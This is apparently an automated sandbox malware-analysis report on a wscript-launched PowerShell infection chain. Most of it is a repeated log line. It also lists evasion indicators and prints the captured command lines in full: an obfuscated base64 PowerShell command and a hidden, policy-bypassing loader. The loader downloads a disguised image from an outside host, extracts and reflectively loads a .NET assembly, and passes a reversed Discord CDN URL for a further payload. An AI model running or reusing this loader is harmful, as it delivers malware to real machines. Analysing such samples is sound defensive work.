          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: UserDomain();IWshNetwork2.UserName();IHost.CreateObject("WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1903Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1398Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3575Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6216Jump to behavior
          Source: C:\Windows\System32\wscript.exe TID: 6904Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1776Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5992Thread sleep count: 3575 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2320Thread sleep count: 6216 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep time: -16602069666338586s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: wscript.exe, 00000000.00000003.2519666628.0000012510133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000003.2520283812.000001250E08B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522385096.000001250E08D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
          Source: wscript.exe, 00000000.00000003.2519666628.0000012510133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: amsi64_6412.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
